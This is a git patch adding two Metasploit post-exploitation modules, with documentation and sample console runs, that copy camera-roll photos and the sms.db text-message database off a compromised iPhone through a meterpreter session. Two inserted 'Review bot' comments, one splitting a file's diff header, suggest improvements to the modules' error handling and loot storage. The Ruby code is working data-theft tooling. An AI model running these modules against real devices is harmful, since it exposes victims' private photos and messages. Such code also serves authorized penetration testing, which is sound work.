From ea1c4596d9eac6e9e0d6b6a6b4aa543c1e83e3ca Mon Sep 17 00:00:00 2001
From: Jacob Robles
Date: Fri, 2 Nov 2018 13:46:58 -0500
Subject: [PATCH] Land #10901, Add modules for iOS images and texts
---
.../post/apple_ios/gather/ios_image_gather.md | 35 +++++++++++++
.../post/apple_ios/gather/ios_text_gather.md | 31 +++++++++++
.../post/apple_ios/gather/ios_image_gather.rb | 51 +++++++++++++++++++
.../post/apple_ios/gather/ios_text_gather.rb | 41 +++++++++++++++
4 files changed, 158 insertions(+)
create mode 100644 documentation/modules/post/apple_ios/gather/ios_image_gather.md
create mode 100644 documentation/modules/post/apple_ios/gather/ios_text_gather.md
create mode 100644 modules/post/apple_ios/gather/ios_image_gather.rb
create mode 100644 modules/post/apple_ios/gather/ios_text_gather.rb
diff --git a/documentation/modules/post/apple_ios/gather/ios_image_gather.md b/documentation/modules/post/apple_ios/gather/ios_image_gather.md
new file mode 100644
index 0000000000..1c200d81aa
--- /dev/null
+++ b/documentation/modules/post/apple_ios/gather/ios_image_gather.md
@@ -0,0 +1,35 @@
+## Description
+
+ This module downloads the discovered images on iPhones
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. Get a session
+ 3. Do: ```use post/apple_ios/gather/ios_image_gather```
+ 4. Do: ```set SESSION ```
+ 5. Do: ```run```
+ 6. You should get images from the iPhone target.
+
+## Scenarios
+
+### Tested on iOS 10.3.3 on an iPhone 5
+
+ ```
+
+ msf5 > use post/apple_ios/gather/ios_image_gather
+ msf5 post(apple_ios/gather/ios_image_gather) > set session 1
+ session => 1
+ msf5 post(apple_ios/gather/ios_image_gather) > run
+
+ [!] SESSION may not be compatible with this module.
+ [+] Image path found. Will begin searching for images...
+ [*] Directory for iOS images: /Users/space/.msf4/loot/KlaBVw
+ [*] Downloading image: IMG_0001.JPG
+ [*] Downloading image: IMG_0002.JPG
+ [*] Downloading image: IMG_0003.JPG
+ [*] Downloading image: shell.php.jpg
+ [*] Post module execution completed
+
+
+ ```
diff --git a/documentation/modules/post/apple_ios/gather/ios_text_gather.md b/documentation/modules/post/apple_ios/gather/ios_text_gather.md
new file mode 100644
index 0000000000..02d361d3c9
--- /dev/null
+++ b/documentation/modules/post/apple_ios/gather/ios_text_gather.md
@@ -0,0 +1,31 @@
+## Description
+
+ This module downloads the `sms.db` file from iPhones
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. Get a session
+ 3. Do: ```use post/apple_ios/gather/ios_text_gather```
+ 4. Do: ```set SESSION ```
+ 5. Do: ```run```
+ 6. You should get the sms.db file on the iPhone target
+
+## Scenarios
+
+### Tested on iOS 10.3.3 on an iPhone 5
+
+ ```
+
+ msf5 > use post/apple_ios/gather/ios_text_gather
+ msf5 post(apple_ios/gather/ios_text_gather) > set session 1
+ session => 1
+ msf5 post(apple_ios/gather/ios_text_gather) > run
+
+ [!] SESSION may not be compatible with this module.
+ [+] sms.db file found
+ [+] sms.db stored at /Users/space/.msf4/loot/20181101154200_default_192.168.43.49_sms.db.file_591456.txt
+ [*] Post module execution completed
+
+
+ ```
diff --git a/modules/post/apple_ios/gather/ios_image_gather.rb b/modules/post/apple_ios/gather/ios_image_gather.rb
new file mode 100644
index 0000000000..7d2b79abeb
--- /dev/null
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'iOS Image Gatherer',
+ 'Description' => %q{
+ This module collects images from iPhones.
+ Module was tested on iOS 10.3.3 on an iPhone 5.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Shelby Pace' ], # Metasploit Module
+ 'Platform' => [ 'apple_ios' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+ end
+
+ def enum_img(f_path)
+ path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6))
+ local_path = File.expand_path(path)
+
+ ios_imgs = dir(f_path)
+ print_status("Directory for iOS images: #{local_path}")
+
+ opts = { "block_size" => 262144 }
+ ios_imgs.each do |img|
+ begin
+ print_status("Downloading image: #{img}")
+ client.fs.file.download_file("#{local_path}/#{img}", "#{f_path}/#{img}", opts)
+ rescue
+ print_error("#{img} could not be downloaded")
+ end
+ end
+ end
+
+ def run
+ img_path = '/private/var/mobile/Media/DCIM/100APPLE'
+ unless directory?(img_path)
+ fail_with(Failure::NotFound, "Could not find the default image file path")
+ end
+ print_good('Image path found. Will begin searching for images...')
+
+ enum_img(img_path)
+ end
+end
diff --git a/modules/post/apple_ios/gather/ios_text_gather.rb b/modules/post/apple_ios/gather/ios_text_gather.rb
new file mode 100644
index 0000000000..b7b83d22b1
--- /dev/null
+++ b/modules/post/apple_ios/gather/ios_text_gather.rb
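Review bot: In `enum_img` (ios_image_gather.rb) each `img` name is taken from the session's directory listing and interpolated unchanged into the local destination `"#{local_path}/#{img}"`, so data supplied by the remote end decides where the file is written on the operator's machine. Reduce the name to a single path component before using it locally, for example `dest = File.join(local_path, File.basename(img))`, and skip `.` and `..` in case the listing returns them. The inner bare `rescue` also discards the exception, so `print_error` cannot say why a download failed; `rescue ::StandardError => e` with `e.message` in the output would keep that detail. Separately, these files never pass through `store_loot`, so unlike the sms.db module in this same patch nothing is recorded as loot even though `Msf::Auxiliary::Report` is included.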
@@ -0,0 +1,41 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'iOS Text Gatherer',
+ 'Description' => %q{
+ This module collects text messages from iPhones.
+ Tested on iOS 10.3.3 on an iPhone 5.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Shelby Pace' ], # Metasploit Module
+ 'Platform' => [ 'apple_ios' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+ end
+
+ def download_text_db(file_path)
+ db_file_data = read_file(file_path)
+ loc = store_loot('sms.db.file', 'text/plain', session, db_file_data, 'sms.db')
+ print_good("sms.db stored at #{loc}")
+ rescue
+ fail_with(Failure::NoAccess, "Failed to read sms.db file")
+ end
+
+ def run
+ sms_path = '/private/var/mobile/Library/SMS/sms.db'
+ unless file?(sms_path)
+ fail_with(Failure::NotFound, "Couldn't locate sms.db file")
+ end
+
+ print_good('sms.db file found')
+ download_text_db(sms_path)
+ end
+end
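Review bot: The method-level bare `rescue` in `download_text_db` (ios_text_gather.rb) covers `read_file`, `store_loot` and `print_good` alike, so a local failure while writing the loot is still reported as `Failure::NoAccess` with "Failed to read sms.db file", and the underlying exception is dropped. Narrow the rescue to the read, or use `rescue ::StandardError => e` and append `e.message` to the failure text so the operator can tell which step failed. The loot is also labelled `'text/plain'` although sms.db is a SQLite database, and the sample run in this patch's documentation shows it saved with a `.txt` suffix. A binary content type such as `'application/octet-stream'` would describe the stored file more accurately for whoever processes it later.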